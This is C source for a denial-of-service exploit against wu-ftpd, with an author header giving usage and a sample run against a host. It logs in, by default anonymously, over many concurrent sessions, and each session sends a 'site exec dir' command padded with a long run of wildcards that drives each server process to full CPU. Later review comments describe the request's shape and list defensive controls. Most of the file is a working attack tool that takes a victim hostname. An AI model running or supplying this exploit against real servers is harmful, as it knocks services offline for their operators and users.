/*
 * Exploit for wu-ftpd all versions by pi3 (pi3ki31ny).
 *
 * How to use? To saw effect you can run only one process this exploit. Example:
 *
 * root@pi3:~/root/all/IsP/projekty/sploity/wu-ftpd# cc p_wu.c -o p_wu
 * root@pi3:~/root/all/IsP/projekty/sploity/wu-ftpd# ./p_wu
 *
 *
 *         ...::: -=[ Remote eating CPU power in wu-ftpd by pi3 (pi3ki31ny) ]=- :::...
 *
 *                 [*] Ussage: ./p_wu [options]
 *
 *         Options:
 *
 *                 -v <victims hostname>
 *                 -o [   port                   - standard -> 21              ]
 *                 -l [   login                  - standard -> ftp             ]
 *                 -p [   password               - standard -> daj@na.wino     ]
 *                 -i [   how many connections   - standard -> 15              ]
 *                 -c [   directory              - standard -> don't change    ]
 *                 -h This stupid help screen...
 *
 *
 * root@pi3:~/root/all/IsP/projekty/sploity/wu-ftpd# ./p_wu -v 0
 *
 *
 *         ...::: -=[ Remote eating CPU power in wu-ftpd by pi3 (pi3ki31ny) ]=- :::...
 *
 *         [*] Connected to: 0
 *         [*] Banner: 220 darkstar.example.net FTP server (Version wu-2.6.2(1) Fri Oct 22 02:54:53 CEST 2004) ready.
 *         [*] Sending USER: ftp...                OK!
 *         [*] Sending PASS: daj@na.wino...        OK!
 *         [*] Sending evil command...             OK!    < 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 >
 *
 *
 * root@dpi3:~/root/all/IsP/projekty/sploity/wu-ftpd# ps aux |grep ftpd
 * ftp       1592  7.1  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1594  7.1  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1596  7.1  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1598  7.1  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1600  7.1  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1602  7.1  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1604  6.9  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1606  6.7  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1608  6.5  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1610  6.3  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1612  5.9  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1614  5.9  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1616  5.9  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1618  5.9  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * ftp       1620  5.9  0.8  2032 1056 ?        R    05:01   0:05 ftpd: localhost:
 * root@pi3:~/root/all/IsP/projekty/sploity/wu-ftpd#
 * 
 * And what we can saw wu-ftpd ate all free CPU power... but this do only 15 connections.
 * Very good effect i have with running ~20 - ~30 sesion after that my system will
 * work very slow (i can't do in practical nothink! - use option -i to change how many times sploit
 * will be connect to server and use bug).
 *
 * Btw. Try always to change directory where is more files / directories it's better for sploit ;-)
 *
 * Ok. Thanks for read this shit and let's go to ate CPU power! ;-)
 *
 * Special greetz: appelast
 * Greetz: [greetz on my web] && other my friends (you know who you are)
 *
 *         ...::: -=[ www.pi3.int.pl ]=- :::...
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/wait.h>
#include <getopt.h>

#define TRUE     1
#define FALSE    0
#define FAL_EX  -1

#define BUFS 210
#define PORT 21
#define LOGN "ftp"
#define PASS "daj@na.wino"
#define SA struct sockaddr
#define pi3 TRUE

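/*
 * Check whether an FTP server reply begins with the status code expected
 * for one step of the session.
 *
 *   mode 1 -> "331"
 *   mode 2 -> "230"
 *   mode 3 -> "200"
 *   mode 4 -> "250"
 *
 * ans is the raw reply text; only its first three characters are compared.
 *
 * Returns 1 (TRUE) on a match and 0 (FALSE) otherwise. An unknown mode or
 * a NULL reply also yields 0: the original fell off the end of the
 * function for any mode outside 1..4, so the caller read an indeterminate
 * value.
 */
int vrfy(int mode, char *ans) {
   static const char *const expected[] = { "331", "230", "200", "250" };
   const int known_mode = (mode >= 1 && mode <= 4);

   /* The logical operators yield exactly 1 or 0, i.e. the file's TRUE / FALSE;
    * short-circuiting keeps expected[] from being indexed with a bad mode. */
   return known_mode && ans != NULL && strncmp(ans, expected[mode - 1], 3) == 0;
}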

/*
 * Print the banner and the option summary to stdout, then terminate the
 * process with exit status FAL_EX. This function never returns.
 *
 * arg: program name shown in the "Ussage" line (main passes argv[0]).
 */
void ussage(char *arg) {
   static const char *const option_rows[] = {
      "\t\t-v <victims hostname>\n",
      "\t\t-o [   port                   - standard -> 21              ]\n",
      "\t\t-l [   login                  - standard -> ftp             ]\n",
      "\t\t-p [   password               - standard -> daj@na.wino     ]\n",
      "\t\t-i [   how many connections   - standard -> 15              ]\n",
      "\t\t-c [   directory              - standard -> don't change    ]\n",
      "\t\t-h This stupid help screen...\n\n\n",
   };
   size_t row;

   fputs("\n\n\t...::: -=[ Remote eating CPU power in wu-ftpd by pi3 (pi3ki31ny) "
         "]=- :::...\n", stdout);
   printf("\n\t\t[*] Ussage: %s [options]\n\n", arg);
   fputs("\tOptions:\n\n", stdout);

   for (row = 0; row < sizeof option_rows / sizeof option_rows[0]; row++)
      fputs(option_rows[row], stdout);

   exit(FAL_EX);
}

/*
 * Entry point.
 *
 * Parses the command-line options, builds one fixed FTP command line in
 * `buf`, then runs `howmuch` sessions one after another. Each session
 * reads the banner, sends USER and PASS, optionally sends CWD, writes the
 * prepared command and moves on. No reply to that last command is read and
 * the socket is never closed, so every session stays open until the
 * process exits.
 *
 * Returns pi3 (TRUE, i.e. 1) after the loop; every error path calls
 * exit(FAL_EX).
 *
 * Reading this as a defender: the request produced here is a
 * `site exec dir` line whose argument is a 192-character run of '*'
 * followed by ".*", sent once per session by an authenticated (by default
 * anonymous "ftp") user. The file header shows the effect as one ftpd
 * process per session sitting in the R state. Controls that follow
 * directly from that shape are: turning SITE EXEC off where it is not
 * needed, alerting on SITE EXEC arguments made of long wildcard runs,
 * capping concurrent sessions per source, and putting CPU limits on the
 * per-session ftpd processes.
 *
 * NOTE(review): read(), write() and bzero() are called below, but neither
 * <unistd.h> nor <strings.h> appears in this file's include list.
 */
int main(int argc, char *argv[]) {
   
   /* NOTE(review): `line` and `pid` are declared but never used below. */
   char buf[BUFS],line[100],tmp_buf[200],*login=LOGN,*pass=PASS,*victim=NULL,*cwd=NULL;
   long inet;
   int pid,sockfd,i,port=PORT,opt=FALSE,ret_vrfy=FALSE,tmp,howmuch=15;
   struct sockaddr_in servaddr;
   struct hostent *h;
   
   /* No arguments at all: print the help text and exit (argv[FALSE] is argv[0]). */
   if (argc<2)
     ussage(argv[FALSE]);
   
   /* getopt() returns -1 (FAL_EX) once every option has been consumed. */
   while((opt = getopt(argc,argv,"v:o:l:p:c:i:h")) != FAL_EX) {
      
      switch(opt) {
	 
       case 'v':
	 
	 /* Keep the name for the status output and resolve it; a failed lookup
	  * is fatal. */
	 victim=optarg;
	 if ( (h=gethostbyname((char*)optarg)) == NULL) {
	    printf("Gethostbyname() field!\n");
	    exit(FAL_EX);
	 }
	 /* Copies the first 4 bytes of the first resolved address into `inet`. */
	 memcpy (&inet, h->h_addr, 4);
	 break;
	 
       case 'o':
	 
	 /* atoi() reports no errors: non-numeric text becomes port 0. */
	 port=atoi(optarg);
	 break;
	 
       case 'l':
	 
	 login=optarg;
	 break;
	 
       case 'p':
	 
	 pass=optarg;
	 break;
	 
       case 'c':
        
         cwd=optarg;
	 break;
	 
       case 'i':
       
         /* Session count; unchecked, so zero or a negative value skips the loop. */
         howmuch=atoi(optarg);
	 break;
	 
       case 'h':
       default:
	 
	 /* ussage() calls exit(), so the break below is never reached. */
	 ussage(argv[FALSE]);
	 break;
	 
      }
   }
   
   /* Destination socket address: IPv4, the port from -o (default PORT), and
    * INADDR_ANY as the address. Only these three fields are assigned; the
    * structure is not zeroed first. */
   servaddr.sin_family      = AF_INET;
   servaddr.sin_port        = htons(port);
   servaddr.sin_addr.s_addr = htonl(INADDR_ANY);
   
   /* Build the command line once: 14 characters of prefix, 192 '*', then
    * ".*\n". That is 209 characters plus the terminating NUL, which fills
    * buf[BUFS] (210) exactly; strcat() finds its terminator only because of
    * the bzero() above it. */
   bzero(buf,sizeof(buf));
   strcpy(buf,"site exec dir ");
   for (i=FALSE;i<192;i++)
     buf[14+i] = '*';
   strcat(buf,".*\n");

   /* One FTP session per iteration. Status output is printed for the first
    * session only (tmp==FALSE); later sessions print just their number. */
   for (tmp=FALSE;tmp<howmuch;tmp++) {
      
      /* sockfd is overwritten on every pass and never close()d. */
      if ( (sockfd=socket(AF_INET,SOCK_STREAM,FALSE)) <FALSE ) {
	 printf("Socket() error!\n");
	 exit(FAL_EX);
      }
      
      if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) <FALSE ) {
	 printf("Connect() error!\n");
	 exit(FAL_EX);
      }
      
      if (tmp==FALSE) {   
	 printf("\n\n\t...::: -=[ Remote eating CPU power in wu-ftpd by pi3 (pi3ki31ny) \
]=- :::...\n");
	 printf("\n\t[*] Connected to: %s\n",victim);
      }
      bzero(tmp_buf,sizeof(tmp_buf));
      
      /* Read the server banner.
       * NOTE(review): read() may fill all 200 bytes, leaving tmp_buf without
       * a terminating NUL for the strlen() below. If it returns 0 (peer
       * closed), strlen() is 0 and the assignment writes tmp_buf[-1]. The
       * peer therefore controls whether this client stays within its buffer.
       * The same read pattern is repeated for every reply in this loop. */
      i=FALSE;
      if ( (i=read(sockfd,tmp_buf,sizeof(tmp_buf))) == FAL_EX) {
	 printf("I can\'t read from source host baner...\nExiting...\n\n");
	 exit(FAL_EX);
      }
      /* Drops the last character of the banner, presumably the trailing newline. */
      tmp_buf[strlen(tmp_buf)-1]='\0';
      if (tmp==FALSE)
	printf("\t[*] Banner: %s\n",tmp_buf);
      bzero(tmp_buf,sizeof(tmp_buf));
      /* Lines are terminated with "\n" only, not the "\r\n" used by FTP. */
      snprintf(tmp_buf,sizeof(tmp_buf),"USER %s\n",login);
      if (tmp==FALSE)
	printf("\t[*] Sending USER: %s... ",login);
      
      i=FALSE;
      if ( (i=write(sockfd,tmp_buf,strlen(tmp_buf))) == FAL_EX) {
	 printf("I can\'t write to source host login...\nExiting...\n\n");
	 exit(FAL_EX);
      }
      
      /* NOTE(review): assumes one read() returns the whole reply; TCP does
       * not guarantee that. */
      bzero(tmp_buf,sizeof(tmp_buf)),i=FALSE;
      if ( (i=read(sockfd,tmp_buf,sizeof(tmp_buf))) == FAL_EX) {
	 printf("I can\'t read from source host...\nExiting...\n\n");
	 exit(FAL_EX);
      }
      
      /* Mode 1 (TRUE) checks for reply code 331, although the message printed
       * on failure names 230. */
      if ( (ret_vrfy=vrfy(TRUE,tmp_buf)) == FALSE) {
	 printf("Error! server don\'t answer with code 230!\n(if it\'s normal \
ignore this in source code!)\n\n");
	 exit(FAL_EX);
      }
      
      if (tmp==FALSE)
	printf("\t\tOK!\n");
      i=FALSE,bzero(tmp_buf,sizeof(tmp_buf));
      snprintf(tmp_buf,sizeof(tmp_buf),"PASS %s\n",pass);
      /* The password is echoed to stdout in clear text. */
      if (tmp==FALSE)
	printf("\t[*] Sending PASS: %s... ",pass);
      
      if ( (i=write(sockfd,tmp_buf,strlen(tmp_buf))) == FAL_EX) {
	 printf("I can\'t write to source host password...\nExiting...\n\n");
	 exit(FAL_EX);
      }
      
      bzero(tmp_buf,sizeof(tmp_buf)),i=FALSE,ret_vrfy=FALSE;
      if ( (i=read(sockfd,tmp_buf,sizeof(tmp_buf))) == FAL_EX) {
	 printf("I can\'t read from source host...\nExiting...\n\n");
	 exit(FAL_EX);
      }
      
      /* Mode 2 (TRUE+1) checks for reply code 230. */
      if ( (ret_vrfy=vrfy(TRUE+1,tmp_buf)) == FALSE) {
	 printf("Error! server don\'t answer with code 230!\n(if it\'s normal \
ignore this in source code!)\n\n");
	 exit(FAL_EX);
      }
      
      bzero(tmp_buf,sizeof(tmp_buf)),i=FALSE,ret_vrfy=FALSE;
      if (tmp==FALSE)
	printf("\tOK!\n");
      
      /* Optional step, taken only when -c was given. */
      if (cwd!=NULL) {
	 snprintf(tmp_buf,sizeof(tmp_buf),"CWD %s\n",cwd);
	 if (tmp==FALSE)
	   printf("\t[*] Changing directory: %s... ",cwd);
	 
	 if ( (i=write(sockfd,tmp_buf,strlen(tmp_buf))) == FAL_EX) {
	    printf("I can\'t write to source host change directory...\nExiting...\n\n");
	    exit(FAL_EX);
	 }
	 
	 bzero(tmp_buf,sizeof(tmp_buf)),i=FALSE,ret_vrfy=FALSE;
	 if ( (i=read(sockfd,tmp_buf,sizeof(tmp_buf))) == FAL_EX) {
	    printf("I can\'t read from source host...\nExiting...\n\n");
	    exit(FAL_EX);
	 }
	 
	 /* Mode 4 (TRUE+3) checks for reply code 250. */
	 if ( (ret_vrfy=vrfy(TRUE+3,tmp_buf)) == FALSE) {
	    printf("Error! server don\'t answer with code 250!\n(if it\'s normal \
ignore this in source code!)\n\n");
	    exit(FAL_EX);
	 }
	 bzero(tmp_buf,sizeof(tmp_buf)),i=FALSE,ret_vrfy=FALSE;
	 if (tmp==FALSE)
	   printf("\tOK!\n");
      }
      
      if (tmp==FALSE)
	printf("\t[*] Sending evil command...");
      
      /* Writes the line prepared in buf. Nothing is read back afterwards, so
       * the "OK!" printed below means only that write() did not return -1. */
      if ( (i=write(sockfd,buf,strlen(buf))) == FAL_EX) {
	 printf("I can\'t write to source host evil command...\nExiting...\n\n");
	 exit(FAL_EX);
      }
      
      /* Running list of session numbers: "< 1 2 3 ...". */
      if (tmp==FALSE)
	printf("\t\tOK!    < %d",tmp+1);
      if (tmp!=FALSE)
	printf(" %d",tmp+1);
   }
   
   printf(" >\n\n\n");
   /* pi3 is defined as TRUE, so a completed run exits with status 1. */
   return pi3;
}


